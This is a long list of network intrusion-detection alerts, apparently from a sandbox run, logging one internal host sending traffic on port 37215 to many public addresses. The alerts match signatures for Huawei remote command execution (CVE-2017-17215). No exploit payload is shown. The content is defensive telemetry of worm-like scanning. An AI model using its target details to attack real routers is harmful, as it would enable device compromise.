                                            06/14/24-10:44:16.735368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593037215192.168.2.14156.113.178.127
                                            06/14/24-10:43:48.031369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775837215192.168.2.14156.30.229.131
                                            06/14/24-10:43:36.701415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983237215192.168.2.14156.108.233.166
                                            06/14/24-10:44:12.641522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643437215192.168.2.14197.231.164.228
                                            06/14/24-10:44:24.942623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501637215192.168.2.14156.193.156.132
                                            06/14/24-10:44:12.617616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848437215192.168.2.14197.240.210.111
                                            06/14/24-10:43:52.146623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141037215192.168.2.14197.167.185.204
                                            06/14/24-10:44:06.452262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499637215192.168.2.14197.235.50.41
                                            06/14/24-10:44:14.666730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249237215192.168.2.1441.198.121.150
                                            06/14/24-10:44:14.681890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021637215192.168.2.14197.13.75.125
                                            06/14/24-10:44:04.424258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3357637215192.168.2.14156.212.114.203
                                            06/14/24-10:43:58.292455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750637215192.168.2.14197.214.185.150
                                            06/14/24-10:44:14.672758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800837215192.168.2.14156.32.77.238
                                            06/14/24-10:43:50.072786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5053437215192.168.2.14197.235.250.195
                                            06/14/24-10:44:33.134167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475837215192.168.2.1441.44.16.175
                                            06/14/24-10:44:29.025487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849037215192.168.2.14197.30.23.158
                                            06/14/24-10:44:12.616226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421437215192.168.2.1441.189.67.15
                                            06/14/24-10:43:43.940636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084437215192.168.2.14197.59.250.220
                                            06/14/24-10:44:14.681980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529437215192.168.2.14197.197.207.186
                                            06/14/24-10:43:45.968508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4418837215192.168.2.1441.183.177.27
                                            06/14/24-10:44:26.979978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261237215192.168.2.1441.59.28.227
                                            06/14/24-10:44:14.666223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729437215192.168.2.14156.117.92.240
                                            06/14/24-10:44:06.449934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489837215192.168.2.14156.237.34.146
                                            06/14/24-10:44:18.777781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807037215192.168.2.1441.70.254.128
                                            06/14/24-10:44:06.451222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5780637215192.168.2.14197.10.130.92
                                            06/14/24-10:43:45.969627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828837215192.168.2.14156.127.189.88
                                            06/14/24-10:44:08.503663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3943837215192.168.2.1441.127.158.229
                                            06/14/24-10:43:36.718246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6047637215192.168.2.14156.152.207.55
                                            06/14/24-10:44:31.052252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086637215192.168.2.14156.94.130.243
                                            06/14/24-10:43:39.813216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157437215192.168.2.14197.143.19.164
                                            06/14/24-10:44:04.410798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434637215192.168.2.14156.216.94.201
                                            06/14/24-10:44:33.150980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793637215192.168.2.14197.89.13.133
                                            06/14/24-10:43:58.290471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548037215192.168.2.14156.106.185.6
                                            06/14/24-10:44:24.934277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420837215192.168.2.1441.232.186.110
                                            06/14/24-10:44:22.882943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335437215192.168.2.1441.23.119.41
                                            06/14/24-10:43:52.145674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723837215192.168.2.14156.255.118.172
                                            06/14/24-10:44:10.564534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434637215192.168.2.14156.121.145.30
                                            06/14/24-10:44:18.776621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4023237215192.168.2.14156.123.101.57
                                            06/14/24-10:43:48.016489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166237215192.168.2.14156.185.93.173
                                            06/14/24-10:43:58.274576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462437215192.168.2.14197.49.51.215
                                            06/14/24-10:44:04.420487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5250437215192.168.2.1441.209.6.80
                                            06/14/24-10:44:22.857883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761037215192.168.2.1441.111.76.248
                                            06/14/24-10:44:00.322548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222637215192.168.2.14156.140.58.139
                                            06/14/24-10:44:08.502660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5796637215192.168.2.14156.146.239.213
                                            06/14/24-10:44:22.860718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960637215192.168.2.14156.199.142.75
                                            06/14/24-10:43:56.229444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677237215192.168.2.14197.86.7.250
                                            06/14/24-10:43:45.966095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539837215192.168.2.14156.161.151.175
                                            06/14/24-10:43:39.809995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386837215192.168.2.1441.16.93.68
                                            06/14/24-10:44:33.148733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863037215192.168.2.1441.122.93.136
                                            06/14/24-10:43:43.971362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4502437215192.168.2.1441.78.153.28
                                            06/14/24-10:43:45.989364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4464637215192.168.2.1441.206.177.1
                                            06/14/24-10:44:18.779257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258837215192.168.2.1441.89.178.231
                                            06/14/24-10:43:36.701973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806037215192.168.2.14197.69.102.240
                                            06/14/24-10:44:12.617805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456037215192.168.2.1441.229.90.128
                                            06/14/24-10:44:18.762244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436837215192.168.2.1441.108.14.208
                                            06/14/24-10:44:31.091285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873037215192.168.2.14156.192.226.62
                                            06/14/24-10:44:33.135194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878437215192.168.2.14156.117.166.51
                                            06/14/24-10:43:39.792001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543837215192.168.2.1441.194.187.118
                                            06/14/24-10:43:34.677238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204237215192.168.2.14197.75.24.151
                                            06/14/24-10:43:41.846642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725837215192.168.2.1441.187.117.105
                                            06/14/24-10:44:08.518168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147037215192.168.2.14197.119.41.200
                                            06/14/24-10:44:24.944542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527637215192.168.2.14197.130.215.200
                                            06/14/24-10:43:41.848007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131837215192.168.2.1441.159.22.203
                                            06/14/24-10:44:02.383826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939637215192.168.2.14197.0.9.92
                                            06/14/24-10:44:08.521499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295837215192.168.2.14197.152.45.183
                                            06/14/24-10:43:43.972368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563637215192.168.2.14197.52.118.186
                                            06/14/24-10:44:04.422986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4081837215192.168.2.1441.15.108.125
                                            06/14/24-10:43:41.848893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750837215192.168.2.14197.173.38.24
                                            06/14/24-10:44:08.504494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120837215192.168.2.14197.81.194.242
                                            06/14/24-10:44:04.406619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531237215192.168.2.14197.98.69.104
                                            06/14/24-10:43:48.029828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3656037215192.168.2.1441.94.33.14
                                            06/14/24-10:44:00.343842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4539437215192.168.2.14197.31.5.170
                                            06/14/24-10:44:14.684863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989037215192.168.2.14197.200.25.59
                                            06/14/24-10:44:00.322043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4139037215192.168.2.14156.157.6.97
                                            06/14/24-10:43:52.143131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831437215192.168.2.14156.100.96.148
                                            06/14/24-10:44:18.777954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697637215192.168.2.14156.106.162.16
                                            06/14/24-10:44:24.934309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536237215192.168.2.1441.253.171.157
                                            06/14/24-10:44:06.453310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058837215192.168.2.14156.146.106.113
                                            06/14/24-10:43:34.676448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4114837215192.168.2.1441.65.170.88
                                            06/14/24-10:44:33.151460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924837215192.168.2.14197.203.224.207
                                            06/14/24-10:44:04.408880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041037215192.168.2.14156.55.204.2
                                            06/14/24-10:43:54.202542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026637215192.168.2.14197.163.41.221
                                            06/14/24-10:44:29.023140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331237215192.168.2.14197.125.56.57
                                            06/14/24-10:43:39.812473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505037215192.168.2.14197.178.214.214
                                            06/14/24-10:43:48.045708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4374637215192.168.2.14197.204.9.102
                                            06/14/24-10:44:04.421745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659037215192.168.2.14197.43.232.86
                                            06/14/24-10:43:54.184954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584437215192.168.2.14156.31.120.246
                                            06/14/24-10:43:58.289770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285237215192.168.2.14156.15.175.238
                                            06/14/24-10:44:35.181655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040437215192.168.2.14197.114.41.211
                                            06/14/24-10:44:26.978540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901237215192.168.2.14197.52.26.113
                                            06/14/24-10:43:54.183225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958837215192.168.2.14156.27.202.74
                                            06/14/24-10:44:12.617751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835037215192.168.2.14156.1.52.169
                                            06/14/24-10:44:16.716183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967237215192.168.2.14156.61.213.36
                                            06/14/24-10:44:14.686836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4335037215192.168.2.1441.170.90.128
                                            06/14/24-10:44:31.054645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735437215192.168.2.1441.175.2.116
                                            06/14/24-10:44:35.177417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4337837215192.168.2.1441.187.251.10
                                            06/14/24-10:44:00.342221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852637215192.168.2.14156.26.47.162
                                            06/14/24-10:44:26.980655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3340437215192.168.2.1441.61.148.105
                                            06/14/24-10:44:06.452583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239837215192.168.2.1441.26.144.166
                                            06/14/24-10:44:00.322002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631237215192.168.2.14197.59.40.154
                                            06/14/24-10:44:18.762787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315637215192.168.2.1441.96.131.70
                                            06/14/24-10:43:45.967271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5508637215192.168.2.14156.169.83.41
                                            06/14/24-10:43:39.789338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399637215192.168.2.14197.139.71.183
                                            06/14/24-10:44:04.420275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362237215192.168.2.14156.230.115.249
                                            06/14/24-10:44:02.382793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200837215192.168.2.14197.247.222.0
                                            06/14/24-10:44:24.913792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5520037215192.168.2.14197.18.59.36
                                            06/14/24-10:43:37.759161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836237215192.168.2.14156.13.194.173
                                            06/14/24-10:44:06.453588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519037215192.168.2.14156.82.201.81
                                            06/14/24-10:44:16.717920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277837215192.168.2.14156.137.105.77
                                            06/14/24-10:44:31.094834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4483837215192.168.2.14156.233.189.196
                                            06/14/24-10:43:48.018516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6041237215192.168.2.1441.116.237.27
                                            06/14/24-10:43:54.184149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848437215192.168.2.14156.117.86.233
                                            06/14/24-10:44:29.014445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946237215192.168.2.1441.233.66.114
                                            06/14/24-10:43:39.792686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060037215192.168.2.1441.117.237.90
                                            06/14/24-10:44:12.616887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587237215192.168.2.1441.19.142.53
                                            06/14/24-10:44:16.715105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437637215192.168.2.1441.42.249.69
                                            06/14/24-10:44:06.470436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412637215192.168.2.14156.154.145.96
                                            06/14/24-10:44:14.689482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5813837215192.168.2.14197.195.212.150
                                            06/14/24-10:44:18.779467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403837215192.168.2.1441.81.139.191
                                            06/14/24-10:44:31.057226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427637215192.168.2.14197.155.217.159
                                            06/14/24-10:43:43.970709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255237215192.168.2.14156.114.231.161
                                            06/14/24-10:44:06.452317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597837215192.168.2.14156.69.39.83
                                            06/14/24-10:44:24.932917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446837215192.168.2.14197.117.160.163
                                            06/14/24-10:44:00.343782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5710437215192.168.2.14156.225.13.142
                                            06/14/24-10:44:26.999881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3300037215192.168.2.14197.246.220.84
                                            06/14/24-10:44:02.366357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791437215192.168.2.14197.235.51.116
                                            06/14/24-10:43:34.663546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3853637215192.168.2.14197.164.90.89
                                            06/14/24-10:43:58.274114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469237215192.168.2.14156.187.150.135
                                            06/14/24-10:43:58.275657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5167237215192.168.2.14197.201.245.134
                                            06/14/24-10:44:29.011794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524837215192.168.2.14197.233.93.28
                                            06/14/24-10:44:31.053088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3718837215192.168.2.14156.105.114.98
                                            06/14/24-10:43:36.722463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265437215192.168.2.14156.239.245.97
                                            06/14/24-10:43:39.792061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855837215192.168.2.14156.251.138.132
                                            06/14/24-10:44:00.324958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203637215192.168.2.1441.44.72.185
                                            06/14/24-10:44:29.011541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472437215192.168.2.1441.137.187.36
                                            06/14/24-10:44:00.323668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045437215192.168.2.14197.165.43.36
                                            06/14/24-10:44:04.411157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688237215192.168.2.14197.161.36.247
                                            06/14/24-10:44:31.091536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677037215192.168.2.1441.86.240.49
                                            06/14/24-10:43:50.111390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660637215192.168.2.1441.48.218.73
                                            06/14/24-10:44:12.615150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502437215192.168.2.14197.99.238.237
                                            06/14/24-10:44:31.086363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433237215192.168.2.1441.41.164.86
                                            06/14/24-10:44:08.503060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377837215192.168.2.14197.76.124.4
                                            06/14/24-10:43:45.989589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5781637215192.168.2.14156.192.255.120
                                            06/14/24-10:44:12.618573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390437215192.168.2.14156.189.206.71
                                            06/14/24-10:44:00.323764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5225637215192.168.2.14156.234.65.219
                                            06/14/24-10:43:34.676961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879637215192.168.2.14156.240.150.152
                                            06/14/24-10:44:14.668648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310837215192.168.2.14156.106.135.7
                                            06/14/24-10:44:06.453562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852437215192.168.2.14156.129.26.199
                                            06/14/24-10:44:02.365007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448837215192.168.2.1441.200.149.23
                                            06/14/24-10:44:14.684365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665837215192.168.2.14156.132.143.2
                                            06/14/24-10:44:10.565668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3577237215192.168.2.1441.220.77.251
                                            06/14/24-10:44:16.715591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555437215192.168.2.1441.32.45.69
                                            06/14/24-10:44:31.084813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039437215192.168.2.1441.177.55.241
                                            06/14/24-10:44:33.148369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4460637215192.168.2.14156.127.157.222
                                            06/14/24-10:44:12.643594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569437215192.168.2.14197.175.97.254
                                            06/14/24-10:44:08.519042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593437215192.168.2.14197.255.150.217
                                            06/14/24-10:44:14.671561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207837215192.168.2.14197.66.14.179
                                            06/14/24-10:44:06.451391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311237215192.168.2.14156.171.250.8
                                            06/14/24-10:44:04.411072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392837215192.168.2.14156.136.62.134
                                            06/14/24-10:43:43.967097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830637215192.168.2.14156.6.180.5
                                            06/14/24-10:43:36.702010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205837215192.168.2.14156.125.253.150
                                            06/14/24-10:44:20.805814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244637215192.168.2.14156.124.165.255
                                            06/14/24-10:43:34.661612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396637215192.168.2.1441.17.142.44
                                            06/14/24-10:44:08.501141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286037215192.168.2.14197.209.65.247
                                            06/14/24-10:43:41.850615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015037215192.168.2.1441.217.229.115
                                            06/14/24-10:44:12.647314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4978037215192.168.2.1441.4.3.119
                                            06/14/24-10:43:41.904648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672237215192.168.2.1441.74.248.244
                                            06/14/24-10:43:58.276795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136637215192.168.2.14156.137.186.66
                                            06/14/24-10:44:00.342985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5395637215192.168.2.1441.163.16.74
                                            06/14/24-10:44:26.980016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5333437215192.168.2.14156.232.192.161
                                            06/14/24-10:43:48.021081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823437215192.168.2.1441.130.87.159
                                            06/14/24-10:44:26.998010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340037215192.168.2.14197.63.238.222
                                            06/14/24-10:44:33.132863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028037215192.168.2.1441.228.13.30
                                            06/14/24-10:43:48.019614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3856437215192.168.2.14197.129.248.44
                                            06/14/24-10:43:34.660977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869837215192.168.2.14156.81.56.92
                                            06/14/24-10:44:22.858384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4129037215192.168.2.1441.142.113.91
                                            06/14/24-10:44:16.715563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922037215192.168.2.14197.8.200.142
                                            06/14/24-10:44:08.518941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4761837215192.168.2.14197.62.248.16
                                            06/14/24-10:44:18.763296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5539437215192.168.2.14156.51.118.90
                                            06/14/24-10:43:48.033370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4477237215192.168.2.14156.147.25.4
                                            06/14/24-10:44:14.669030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499837215192.168.2.14156.92.254.246
                                            06/14/24-10:44:29.022346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3299037215192.168.2.14197.247.169.188
                                            06/14/24-10:44:29.014753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695637215192.168.2.1441.15.232.59
                                            06/14/24-10:43:41.846742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5654837215192.168.2.14156.2.146.186
                                            06/14/24-10:43:41.906551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4973037215192.168.2.14156.185.146.155
                                            06/14/24-10:43:37.761320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4640437215192.168.2.14156.182.131.20
                                            06/14/24-10:44:04.410871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3943037215192.168.2.14156.223.78.124
                                            06/14/24-10:44:04.407666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294037215192.168.2.1441.71.177.224
